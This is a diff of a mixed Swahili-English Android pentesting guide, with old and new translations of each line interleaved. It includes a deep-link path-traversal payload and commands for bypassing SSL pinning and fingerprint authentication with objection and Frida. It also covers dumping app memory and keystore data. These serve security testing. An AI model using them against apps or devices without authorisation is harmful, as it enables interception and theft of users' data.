Broadcast receiver itakuwa ikisubiri aina fulani ya ujumbe. Kulingana na jinsi receiver inavyoshughulikia ujumbe, inaweza kuwa katika hatari.\
[**Jifunze jinsi ya kufaida Broadcast Receivers kwa kutumia Drozer.**](#exploiting-broadcast-receivers)
Broadcast receiver itakuwa inasubiri aina ya ujumbe. Kulingana na jinsi receiver inavyoshughulikia ujumbe inaweza kuwa vulnerable.\
[**Learn how to exploit Broadcast Receivers with Drozer.**](#exploiting-broadcast-receivers)
### **Exploiting Schemes / Deep links**
Unaweza kutafuta deep links kwa mkono, ukitumia zana kama MobSF au scripts kama [hii](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **fungua** scheme iliyotangazwa kwa kutumia **adb** au **kivinjari**:
Unaweza kutafuta deep links manually, kwa kutumia tools kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **open** declared **scheme** kwa kutumia **adb** au **browser**:
```bash
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
```
_Kumbuka kwamba unaweza **omit the package name** na simu itaita moja kwa moja app itakayofungua kiungo hicho._
_Tambua kwamba unaweza **kuacha jina la kifurushi** na simu ya rununu itaita moja kwa moja app inayofaa kufungua kiungo hicho._
```html
<!-- Browser regular link -->
<a href="scheme://hostname/path?param=value">Click me</a>
@ -399,56 +401,56 @@ _Kumbuka kwamba unaweza **omit the package name** na simu itaita moja kwa moja a
```
**Msimbo unaotekelezwa**
Ili kupata **msimbo utakao tekelezwa katika App**, nenda kwenye activity inayoitwa na deeplink na tafuta function **`onNewIntent`**.
Ili kupata **msimbo utakaotekelezwa katika App**, nenda kwenye activity inayoitwa na the deeplink na tafuta function **`onNewIntent`**.
![](<../../images/image (436) (1) (1) (1).png>)
**Taarifa nyeti**
Kila wakati unapokutana na deep link hakikisha haipokei data nyeti (kama passwords) kupitia URL parameters, kwa sababu programu nyingine yoyote inaweza kujifanya deep link na kuiba data hiyo!
Kila unapokutana na deep link hakikisha kwamba **haipokei data nyeti (kama passwords) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
**Parameters in path**
**Vigezo katika path**
Lazima pia ukague ikiwa deep link yoyote inatumia parameter ndani ya path ya URL kama: `https://api.example.com/v1/users/{username}` , katika kesi hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Note that if you find the correct endpoints inside the application you may be able to cause a **Open Redirect** (if part of the path is used as domain name), **account takeover** (if you can modify users details without CSRF token and the vuln endpoint used the correct method) and any other vuln. More [info about this here](http://dphoeniixx.com/2020/12/13-2/).
Unapaswa pia **kuhakiki kama deep link yoyote inatumia parameter ndani ya path** ya URL kama: `https://api.example.com/v1/users/{username}` , katika hali hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ukipata endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumika kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na endpoint iliyo na udhaifu ilitumia method sahihi) na udhaifu mwingine wowote. Habari zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/).
**Mifano zaidi**
Ripoti ya bug bounty yenye kuvutia: [interesting bug bounty report](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
Ripoti ya bug bounty yenye kuvutia: [https://hackerone.com/reports/855618](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
### Uchunguzi wa Transport Layer na Kushindwa kwa Uthibitishaji
### Ukaguzi wa Transport Layer na Kushindwa kwa Uthibitishaji
- **Certificates are not always inspected properly** na applications za Android. Mara nyingi hizi applications hupuuza onyo na kukubali self-signed certificates au, katika matukio mengine, kurudi kutumia muunganisho wa HTTP.
- **Negotiations during the SSL/TLS handshake are sometimes weak**, zikitumia insecure cipher suites. Utaifu huu hufanya muunganisho uwe nyeti kwa man-in-the-middle (MITM) attacks, ukiruhusu mshambuliaji ku-decrypt data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha watumiaji kwa kutumia channel salama lakini kisha kuwasiliana kwa channels zisizo salama kwa miamala mingine. Mbinu hii hailindi data nyeti, kama session cookies au maelezo ya mtumiaji, dhidi ya interception na wahalifu.
- **Vyeti mara nyingi havikaguliwi ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuza onyo na kukubali self-signed certificates au, katika baadhi ya matukio, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake mara nyingine huwa dhaifu**, kwa kutumia insecure cipher suites. Udhaifu huu unafanya muunganisho uwe hatarini kwa man-in-the-middle (MITM) attacks, ukiruhusu wadukuzi kufungua encryption ya data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha kwa kutumia channels salama lakini kisha zinasiliana kwa channels zisizo salama kwa ajili ya miamala mingine. Njia hii inashindwa kulinda data nyeti, kama session cookies au maelezo ya watumiaji, dhidi ya kukamatwa na wahalifu.
#### Certificate Verification
#### Uhakiki wa vyeti
Tutalenga kwenye **certificate verification**. Uadilifu wa certificate ya server lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu usanidi wa TLS usio salama na kusafirisha data nyeti kupitia channels zisizo-simbwa kunaweza kusababisha hatari kubwa. Kwa hatua za kina juu ya kuthibitisha certificates za server na kushughulikia udhaifu, [**this resource**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo kamili.
Tutatilia maanani **certificate verification**. Uadilifu wa certificate ya server lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu TLS configurations zisizo salama na uhamishaji wa data nyeti kupitia channels zisizo encrypted vinaweza kuleta hatari kubwa. Kwa hatua za kina juu ya jinsi ya kuthibitisha server certificates na kushughulikia udhaifu, rasilimali hii [**inatoa mwanga**](https://manifestsecurity.com/android-application-security-part-10/).
#### SSL Pinning
SSL Pinning ni hatua ya usalama ambapo application inathibitisha certificate ya server dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Njia hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunapendekezwa kwa nguvu kwa applications zinazoshughulikia taarifa nyeti.
SSL Pinning ni tahadhari ya usalama ambapo application inathibitisha certificate ya server dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Mbinu hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunashauriwa kwa nguvu kwa applications zinazosimamia taarifa nyeti.
#### Traffic Inspection
#### Ukaguzi wa Traffic
Ili kuchunguza trafiki ya HTTP, ni muhimu **kusakinisha certificate ya proxy tool** (mfano, Burp). Bila kusakinisha certificate hii, trafiki iliyosimbwa huenda isiweze kuonekana kupitia proxy. Kwa mwongozo wa kusakinisha custom CA certificate, [**click here**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Ili kuchambua HTTP traffic, ni lazima **usakinishe certificate ya chombo cha proxy** (mfano, Burp). Bila kusakinisha certificate hii, traffic iliyosimbwa inaweza isionewe kupitia proxy. Kwa mwongozo wa jinsi ya kusakinisha custom CA certificate, [**bofya hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Applications zinazolenga **API Level 24 and above** zinahitaji mabadiliko kwenye Network Security Config ili kukubali proxy's CA certificate. Hatua hii ni muhimu kwa kuchunguza trafiki iliyosimbwa. Kwa maelekezo juu ya kubadilisha Network Security Config, [**refer to this tutorial**](make-apk-accept-ca-certificate.md).
Applications zinazolenga **API Level 24 and above** zinahitaji mabadiliko kwenye Network Security Config ili kukubali CA certificate ya proxy. Hatua hii ni muhimu kwa kuchambua traffic iliyosimbwa. Kwa maelekezo ya jinsi ya kubadilisha Network Security Config, [**rejea mwongozo huu**](make-apk-accept-ca-certificate.md).
If **Flutter** is being used you need to to follow the instructions in [**this page**](flutter.md). This is becasue, just adding the certificate into the store won't work as Flutter has its own list of valid CAs.
Ikiwa **Flutter** inatumika unahitaji kufuata maelekezo kwenye [**ukurasa huu**](flutter.md). Hii ni kwa sababu, kuongeza certificate kwenye store peke yake haitafanya kazi kwani Flutter ina orodha yake ya CAs zinazokubalika.
#### Static detection of SSL/TLS pinning
#### Utambuzi wa static wa SSL/TLS pinning
Kabla ya kujaribu runtime bypasses, ramani kwa haraka sehemu ambako pinning inatekelezwa katika APK. Ugunduzi wa static utakusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Kabla ya kujaribu runtime bypasses, panga haraka maeneo ambapo pinning inatekelezwa katika APK. Utambuzi wa static utakusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Tool: SSLPinDetect
- Open-source static-analysis utility that decompiles the APK to Smali (via apktool) and scans for curated regex patterns of SSL/TLS pinning implementations.
- Reports exact file path, line number, and a code snippet for each match.
- Covers common frameworks and custom code paths: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.
- Open-source static-analysis utility inayofanya decompile ya APK hadi Smali (kupitia apktool) na kutafuta curated regex patterns za utekelezaji wa SSL/TLS pinning.
- Inaripoti path ya faili kwa usahihi, nambari ya mstari, na kipande cha code kwa kila match.
- Inafunika frameworks za kawaida na code paths za custom: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, na Network Security Config XML pins.
Sakinisha
- Mahitaji ya awali: Python >= 3.8, Java on PATH, apktool
- Masharti ya awali: Python >= 3.8, Java on PATH, apktool
```bash
git clone https://github.com/aancw/SSLPinDetect
cd SSLPinDetect
@ -462,8 +464,9 @@ python sslpindetect.py -f app.apk -a apktool.jar
# Verbose (timings + per-match path:line + snippet)
python sslpindetect.py -a apktool_2.11.0.jar -f sample/app-release.apk -v
```
Mifano ya kanuni za pattern (JSON)
Tumia au ongeza signatures ili kutambua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na scan kwa kiwango kikubwa.
Mifano ya sheria za muundo (JSON)
Tumia au panua signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na kutafuta kwa wingi.
```json
{
"OkHttp Certificate Pinning": [
@ -477,41 +480,43 @@ Tumia au ongeza signatures ili kutambua proprietary/custom pinning styles. Unawe
]
}
```
Vidokezo na ushauri
- Kukagua kwa haraka kwenye apps kubwa kupitia multi-threading na memory-mapped I/O; pre-compiled regex hupunguza overhead/false positives.
- Mkusanyiko wa pattern: https://github.com/aancw/smali-sslpin-patterns
- Malengo ya kawaida ya utambuzi ya kuchunguza baadae:
- OkHttp: matumizi ya CertificatePinner, setCertificatePinner, okhttp3/okhttp package references
- TrustManagers maalum: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
Notes and tips
- Skanning ya haraka kwenye apps kubwa kupitia multi-threading na memory-mapped I/O; regex zilizo pre-compiled hupunguza mzigo/matokeo ya uwongo.
- Pattern collection: https://github.com/aancw/smali-sslpin-patterns
- Malengo ya kawaida ya utambuzi kwa kuchambua ifuatayo:
- OkHttp: CertificatePinner usage, setCertificatePinner, okhttp3/okhttp package references
- Custom TrustManagers: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
- Custom SSL contexts: SSLContext.getInstance + SSLContext.init with custom managers
- Declarative pins katika res/xml network security config na manifest references
- Tumia maeneo yaliyolingana kupanga Frida hooks, static patches, au config reviews kabla ya dynamic testing.
- Declarative pins in res/xml network security config and manifest references
- Tumia maeneo yaliyolingana kupanga Frida hooks, static patches, au mapitio ya config kabla ya majaribio ya dynamic.
#### Kupitisha SSL Pinning
Wakati SSL Pinning imewekwa, kuipita kunakuwa muhimu ili kuchunguza trafiki ya HTTPS. Mbinu mbalimbali zinapatikana kwa madhumuni haya:
- Kiotomatiki **badilisha** the **apk** ili **kupitisha** SSLPinning kwa kutumia [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida kubwa ya chaguo hili ni kwamba hautahitaji root kupitisha SSL Pinning, lakini utalazimika kufuta application na kuisakinisha upya, na hii haitafanya kazi kila mara.
- Unaweza kutumia **Frida** (discussed below) kupitisha ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- Unaweza pia kujaribu **kuipita kiotomatiki SSL Pinning** kutumia [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- Unaweza pia kujaribu **kuipita kiotomatiki SSL Pinning** kwa kutumia **MobSF dynamic analysis** (explained below)
- Ikiwa bado unaona kuna trafiki ambayo hauiangalii unaweza kujaribu **kupeleka trafiki kwa burp kwa kutumia iptables**. Soma blogu hii: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
#### Bypassing SSL Pinning
#### Kutafuta udhaifu wa wavuti wa kawaida
When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Various methods are available for this purpose:
Ni muhimu pia kutafuta udhaifu wa wavuti wa kawaida ndani ya application. Maelezo ya kina juu ya kutambua na kupunguza udhaifu haya yapita upeo wa muhtasari huu lakini yameelezewa kwa undani mahali pengine.
- Automatically **modify** the **apk** to **bypass** SSLPinning with [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). The best pro of this option, is that you won't need root to bypass the SSL Pinning, but you will need to delete the application and reinstall the new one, and this won't always work.
- You could use **Frida** (discussed below) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- You can also try to **automatically bypass SSL Pinning** using [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- You can also try to **automatically bypass SSL Pinning** using **MobSF dynamic analysis** (explained below)
- If you still think that there is some traffic that you aren't capturing you can try to **forward the traffic to burp using iptables**. Read this blog: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
#### Looking for Common Web Vulnerabilities
Ni muhimu pia kutafuta vulnerabilities za kawaida za web ndani ya application. Maelezo ya kina juu ya utambuzi na kupunguza vulnerabilities hizi hayamo katika muhtasari huu lakini yameelezwa kwa kina mahali pengine.
### Frida
[Frida](https://www.frida.re) ni dynamic instrumentation toolkit kwa developers, reverse-engineers, na security researchers.\
**Unaweza kupata running application na ku-hook methods wakati wa runtime kubadilisha tabia, badilisha values, extract values, run different code...**\
Ikiwa unataka pentest Android applications lazima ujue jinsi ya kutumia Frida.
[Frida](https://www.frida.re) is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.\
**Unaweza kufikia application inayokimbia na ku-hook methods wakati wa runtime ili kubadilisha tabia, kubadilisha values, kutoa values, kuendesha code tofauti...**\
Kama unataka pentest Android applications ni muhimu ujue jinsi ya kutumia Frida.
- Jifunze jinsi ya kutumia Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Baadhi ya "GUI" kwa vitendo na Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection ni nzuri ku-automate matumizi ya Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- Unaweza kupata baadhi ya Awesome Frida scripts hapa: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Jaribu kupitisha anti-debugging / anti-frida mechanisms kwa kupakia Frida kama inavyoelezwa katika [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (tool [linjector](https://github.com/erfur/linjector-rs))
- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Some "GUI" for actions with Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection is great to automate the use of Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- You can find some Awesome Frida scripts here: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Try to bypass anti-debugging / anti-frida mechanisms loading Frida as in indicated in [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (tool [linjector](https://github.com/erfur/linjector-rs))
#### Anti-instrumentation & SSL pinning bypass workflow
@ -521,9 +526,9 @@ android-anti-instrumentation-and-ssl-pinning-bypass.md
### **Dump Memory - Fridump**
Angalia kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi, kama vile passwords au mnemonics.
Kagua kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi, kama passwords au mnemonics.
Kutumia [**Fridump3**](https://github.com/rootbsd/fridump3) unaweza dump memory ya app kwa:
Using [**Fridump3**](https://github.com/rootbsd/fridump3) you can dump the memory of the app with:
```bash
# With PID
python3 fridump3.py -u <PID>
@ -532,15 +537,15 @@ python3 fridump3.py -u <PID>
frida-ps -Uai
python3 fridump3.py -u "<Name>"
```
Hii itadump memory katika folda ./dump, na ndani yake unaweza kufanya grep kwa kitu kama:
Hii ita-dump kumbukumbu katika folda ./dump, na hapo unaweza kutumia grep kwa kitu kama:
```bash
strings * | grep -E "^[a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+$"
```
### **Data nyeti katika Keystore**
### **Taarifa nyeti katika Keystore**
Katika Android Keystore ni mahali bora zaidi pa kuhifadhi data nyeti, hata hivyo, kwa vibali vya kutosha bado ni **inawezekana kuipata**. Kwa kuwa apps huenda zikahifadhi hapa **sensitive data in clear text**, pentests zinapaswa kuangalia hili kama root user au mtu mwenye ufikiaji wa kimwili wa kifaa anaweza kuiba data hii.
Katika Android Keystore ni mahali pazuri zaidi pa kuhifadhi taarifa nyeti, hata hivyo, kwa idhini za kutosha bado ni **possible to access it**. Kwa kuwa applications mara nyingi huzihifadhi hapa **sensitive data in clear text**, pentests zinapaswa kuichunguza kwani kama root user au mtu mwenye ufikiaji wa kimwili kwa kifaa anaweza kuiba data hii.
Hata kama app imehifadhi data katika keystore, data hiyo inapaswa kuwa imefungwa kwa usimbaji.
Hata kama app imehifadhi data kwenye keystore, data inapaswa kuwa encrypted.
Ili kufikia data ndani ya keystore unaweza kutumia Frida script hii: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js)
```bash
@ -548,47 +553,47 @@ frida -U -f com.example.app -l frida-scripts/tracer-cipher.js
```
### **Fingerprint/Biometrics Bypass**
Kwa kutumia Frida script ifuatayo inaweza kuwa inawezekana **bypass fingerprint authentication** ambayo Android applications zinaweza kutumia ili **kulinda maeneo maalum nyeti:**
Kutumia Frida script ifuatayo kunaweza kuwa inawezekana **bypass fingerprint authentication** ambayo Android applications zinaweza kufanya ili **kulinda maeneo fulani nyeti:**
```bash
frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app.package>
```
### **Picha za Mandharinyuma**
Unapoweka application katika mandharinyuma, Android huhifadhi **snapshot ya application** ili inaporejeshwa mbele (foreground) inaanza kupakia picha kabla ya application ili ionekane kama application ilipakiwa haraka zaidi.
Unapoiweka programu katika mandharinyuma, Android huhifadhi **snapshot ya programu** ili inaporudishwa mbele inaanza kupakia picha hiyo kabla ya app, hivyo inaonekana kama app ilipakia haraka zaidi.
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba taarifa hiyo** (tazama kwamba unahitaji root ili kuifikia).
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba taarifa hiyo** (kumbuka unahitaji root ili kuifikia).
Snapshots kawaida huhifadhiwa katika: **`/data/system_ce/0/snapshots`**
Snapshots kawaida huhifadhiwa hapa: **`/data/system_ce/0/snapshots`**
Android inatoa njia ya **kuzuia kunyakua screenshot kwa kuweka parameta ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanatendewa kama salama, kizuia kuonekana kwenye screenshots au kuonyeshwa kwenye displays zisizo salama.
Android inatoa njia ya **kuzuia kunakiliwa kwa screenshot kwa kuweka parameter ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanachukuliwa kuwa salama, na kuzuia yaonekana katika screenshots au kuonekana kwenye displays zisizo salama.
```bash
getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
```
### **Android Application Analyzer**
Zana hii inaweza kukusaidia kusimamia zana mbalimbali wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
Chombo hiki kinaweza kukusaidia kusimamia zana mbalimbali wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
### Intent Injection
Waundaji mara nyingi huunda proxy components kama activities, services, na broadcast receivers ambazo zinashughulikia Intent hizi na kuzipitisha kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Developers mara nyingi hufanya proxy components kama activities, services, na broadcast receivers zinazoshughulikia Intents hizi na kuzipitisha kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Hatari iko katika kuwaruhusu watapeli kuanzisha non-exported app components au kupata content providers nyeti kwa kupeleka Intent hizi kwa njia isiyo sahihi. Mfano muhimu ni component ya `WebView` kubadilisha URLs kuwa vitu vya `Intent` kwa kutumia `Intent.parseUri(...)` kisha kuzitekeleza, jambo ambalo linaweza kusababisha malicious Intent injections.
Hatari iko kwenye kuruhusu attackers kuanzisha non-exported app components au kupata access kwa sensitive content providers kwa kupindisha Intents hizi. Mfano muhimu ni component ya `WebView` kubadilisha URLs kuwa Intent objects kupitia `Intent.parseUri(...)` na kisha kuzitekeleza, jambo ambalo linaweza kusababisha malicious Intent injections.
### Vidokezo Muhimu
### Essential Takeaways
- **Intent Injection** ni sawa na suala la wavuti la Open Redirect.
- Exploits zinahusisha kupitisha `Intent` objects kama extras, ambazo zinaweza kuelekezwa ili kutekeleza operesheni zisizo salama.
- Inaweza kufichua non-exported components na content providers kwa watapeli.
- Ubadilishaji wa URL kwenda `Intent` wa `WebView` unaweza kuwezesha vitendo visivyokusudiwa.
- **Intent Injection** ni sawa na tatizo la Open Redirect kwenye web.
- Exploits zinahusisha kupitisha `Intent` objects kama extras, ambazo zinaweza kualikwa upya ili kutekeleza operations zisizo salama.
- Inaweza kufichua non-exported components na content providers kwa attackers.
- Ubadilishaji wa URL kwa Intent kwenye `WebView` unaweza kuwezesha actions zisizokusudiwa.
### Android Client Side Injections and others
Pengine unajua kuhusu aina hii ya vulnerabilities kutoka Web. Lazima uwe mwangalifu hasa na vulnerabilities hizi katika Android application:
Labda unafahamu aina hizi za vulnerabilities kutoka Web. Lazima uwe waangalifu hasa na vulnerabilities hizi katika Android application:
- **SQL Injection:** Unaposhughulika na dynamic queries au Content-Providers hakikisha unatumia parameterized queries.
- **JavaScript Injection (XSS):** Thibitisha kwamba msaada wa JavaScript na Plugin umezimwa kwa WebViews yoyote (imezimwa kwa default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinapaswa kuwa na ufikiaji wa file system umezimwa (umewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika visa kadhaa, wakati Android application inamaliza session, cookie hairevokiwi au inaweza hata kuokolewa kwenye disk
- **JavaScript Injection (XSS):** Thibitisha kwamba JavaScript na Plugin support zimezimwa kwa WebViews yoyote (zimeteuliwa kuwa disabled by default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinapaswa kuwa na access kwa file system zimezima (zimeteuliwa kuwa enabled by default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika visa kadhaa wakati android application inapomaliza session cookie haifutwi au inaweza hata kuokolewa kwenye disk
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags)
---
@ -597,55 +602,55 @@ Pengine unajua kuhusu aina hii ya vulnerabilities kutoka Web. Lazima uwe mwangal
### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
**Uchambuzi wa static**
**Static analysis**
![](<../../images/image (866).png>)
**Tathmini ya vulnerabilities ya application** kwa kutumia frontend nzuri ya web. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa mazingira).
**Vulnerability assessment of the application** kwa kutumia frontend nzuri ya web. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa environment).
```bash
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
```
Kumbuka kwamba MobSF inaweza kuchambua **Android**(apk)**, IOS**(ipa) **and Windows**(apx) programu (_Programu za Windows lazima zichunguzwe kutoka kwenye MobSF iliyosakinishwa kwenye mwenyeji wa Windows_).\
Pia, ikiwa utaunda faili ya **ZIP** yenye msimbo wa chanzo wa app ya **Android** au **IOS** (nenda kwenye folda ya mizizi ya program, chagua kila kitu na tengeneza faili ya ZIP), MobSF itaweza kuichambua pia.
Note that MobSF can analyse **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\
Pia, ikiwa utaunda faili la **ZIP** lenye source code ya app ya **Android** au **IOS** (nenda kwenye root folder ya application, chagua kila kitu na unda ZIPfile), itauweza kuchambua pia.
MobSF pia inakuwezesha kufanya **diff/Compare** ya uchambuzi na kuingiza **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuiwezesha: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, kisha **hash** itapakiwa badala ya faili.
MobSF pia inakuwezesha kufanya **diff/Compare** ya analysis na kuunganisha **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuifanya iwe enabled: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi the **hash** itapakiwa badala ya faili.
### Iliyosaidiwa Dynamic analysis na MobSF
### Assisted Dynamic analysis with MobSF
**MobSF** pia inaweza kuwa msaada mkubwa kwa **dynamic analysis** kwenye **Android**, lakini katika kesi hiyo utahitaji kusakinisha MobSF na **genymotion** kwenye host yako (VM au Docker haitafanya kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
The **MobSF dynamic analyser** can:
**MobSF** inaweza pia kuwa msaada mkubwa kwa **dynamic analysis** kwenye **Android**, lakini katika kesi hiyo utahitaji kusanisha MobSF na **genymotion** kwenye host yako (VM au Docker haitafanya kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
The **MobSF dynamic analyser** inaweza:
- **Dump application data** (URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files). Yote haya hufanywa kiotomatiki isipokuwa kwa screenshots — unahitaji kubofya unapotaka screenshot au kubofya "**Exported Activity Tester**" ili kupata screenshots za exported activities zote.
- **Dump application data** (URLs, logs, clipboard, screenshots ulizofanya mwenyewe, screenshots zilizofanywa na "**Exported Activity Tester**", emails, SQLite databases, XML files, na faili nyingine zilizoundwa). Haya yote hufanywa moja kwa moja isipokuwa screenshots, lazima ubofye wakati unataka screenshot au lazima ubofye "**Exported Activity Tester**" ili kupata screenshots za exported activities zote.
- Capture **HTTPS traffic**
- Tumia **Frida** kupata **runtime** **information**
- Use **Frida** to obtain **runtime** **information**
Kuanzia toleo la **Android** > 5, itaanza **Frida** kiotomatiki na itaweka mipangilio ya **global proxy** kunasa trafiki. Itakanasa trafiki kutoka kwa application inayojaribiwa pekee.
Kutoka kwenye Android **versions > 5**, itaanzisha **Frida** kiotomatiki na itaweka global **proxy** settings ili **capture** traffic. Itakamata traffic tu kutoka kwa application inayojaribiwa.
**Frida**
Kwa default, pia itatumia baadhi ya Frida Scripts ili **bypass SSL pinning**, **root detection** na **debugger detection** na ili **monitor interesting APIs**.\
MobSF pia inaweza **invoke exported activities**, kukamata **screenshots** zao na kuzihifadhi kwa ajili ya ripoti.
Kwa default, itatumia baadhi ya Frida Scripts ili **bypass SSL pinning**, **root detection** na **debugger detection** na pia **monitor interesting APIs**.\
MobSF pia inaweza **invoke exported activities**, kuchukua **screenshots** zao na **kuzi hifadhi** kwa ajili ya report.
